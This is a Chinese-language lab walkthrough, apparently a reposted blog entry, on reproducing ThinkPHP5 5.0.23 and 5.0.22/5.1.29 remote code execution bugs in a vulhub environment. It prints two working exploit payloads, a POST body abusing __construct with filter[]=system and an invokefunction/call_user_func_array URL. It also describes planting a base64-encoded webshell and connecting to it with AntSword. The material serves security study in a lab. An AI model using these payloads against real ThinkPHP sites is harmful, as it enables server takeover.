首页 > Web开发 > 详细

thinkphp框架漏洞

时间:2021-09-23 20:23:09      阅读:28      评论:0      收藏:0      [点我收藏+]

thinkphp5 5.0.23 远程代码执行漏洞

进入vulhub靶场,启动环境。访问http://ip:8080测试靶场是否正常启动

技术分享图片

 

 

使用hcakbar工具,构造payload,构造完毕后点击Execute

 

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=

 

技术分享图片

 

 

命令执行成功
使用phpinfo验证漏洞

技术分享图片

 

 

 写入一句话木马,一句话木马要进行base64编码

技术分享图片

 

 

 技术分享图片

进入容器,查看木马文件是否写入

技术分享图片

 

 

 然后使用蚁剑连接

技术分享图片

 

 

 成功getshell

ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞

 

进入vulhub靶场。启动环境

技术分享图片

 

http://192.168.116.166:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

 

 

 

 技术分享图片

 

 

 

代码执行成功说明存在远程代码执行漏洞

技术分享图片

待更新

 

thinkphp框架漏洞

原文:https://www.cnblogs.com/pursue-security/p/15306776.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!